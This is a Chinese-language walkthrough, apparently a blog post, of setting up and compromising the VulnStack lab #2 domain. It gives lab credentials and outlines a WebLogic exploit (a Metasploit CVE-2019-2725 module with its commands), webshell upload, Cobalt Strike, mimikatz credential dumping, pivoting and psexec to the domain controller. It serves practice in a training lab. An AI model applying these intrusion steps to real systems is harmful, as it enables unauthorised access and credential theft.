前言:
开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。靶场设计思路来源ATT&CK红队评估模式,从漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场。最近正在学习内网知识,这一套靶场还是很有针对性的,可以拿来练手。本次针对第二套靶场进行搭建、环境配置,以及根据渗透测试流程进行渗透,从web应用程序到内网拿下主机,将整个渗透过程记录下来分享给大家。
一、环境搭建
1.1 网络拓扑图构建
1.2 IP配置
攻击机:kali LinuxNAT模式
192.168.85.139(外)
**************************************
(开机默认密码:1qaz@WSX)
WEB服务器:Windows server 2008 NAT模式+仅主机模式(需要以用户de1aly登录,本地登录时账户administrator没有密码,需要重新创建密码1qaz@WSX)
NAT模式:192.168.85.201(外)
仅主机模式:192.168.163.101(内)
PC机:Windows 7 NAT模式+仅主机模式
NAT模式:192.168.85.200(外)
仅主机模式:192.168.163.100(内)
DC域控服务器:Windows server 2012 仅主机模式
192.168.163.10(内)
二、相关配置
2.1 攻击机:kali Linux
先从WEB机开始,注意需要手动开启服务,路径如下:
C:\Oracle\Middleware\user_projects\domains\base_domain\bin下有一个startWeblogic的批处理,管理员身份运行它即可,管理员账号密码:Administrator/1qaz@WSX
2.2 WEB机和PC机:
计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动(Computer Browser 一直自动关闭导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙)
2.3 Web服务器:Windowsserver 2008
开机后启动360防护软件。
手动开启Computer Browser、Server、Workstation等服务
2.4 PC机:Windows 7
开机后启动360防护软件。
手动开启Computer Browser、Server、Workstation服务。
2.5 DC域控服务器:Windowsserver 2012
三、渗透过程记录
3.1 信息收集(注:本次渗透是分段多次进行的,所以可能存在IP变化)
已知web服务器ip地址:192.168.85.201
Nmap扫描主机端口:
主机开放了7001端口,提供Oracle weblogic服务
用工具检测weblogic漏洞,发现后台路径以及一个SSRF漏洞和两个CVE漏洞。
3.2 验证:
1)后台
2)SSRF
3)上传冰蝎马
4)冰蝎连接:
5)cs后门
6)mimikatz抓取密码
现在基本可以确定:
存在域:DE1AY
密码基本都是:1qaz@WSX
3.3 利用msf打cve:
CVE-2019-2725
useexploit/multi/misc/weblogic_deserialize_asyncresponseservice
setrhost 目标IP
setlhost 攻击机IP
settarget 1 #指定靶机是Windows
run
查看开放的端口
添加账户
远程登录+获取域控制器的IP
挂代理,扫内网
设置路由
查看ARP缓存
拿下域控制器
因为之前拿下那台主机里面有个de1ay账户好像有域管理权限知道密码,可以远程桌面登录看看,发现果然是域管理权限,能连上域控制器
然后直接使用psexec连接域控制器拿下域控
之后利用msf生成一个正向shell马,然后使用copy命令上传,然后拿下域控制器。拿下了域控制器,自然之前横向没有拿到的win7主机也变成了囊中之物,最后整个域所有主机的shell如下图所示:
2022-03-15 14:12:21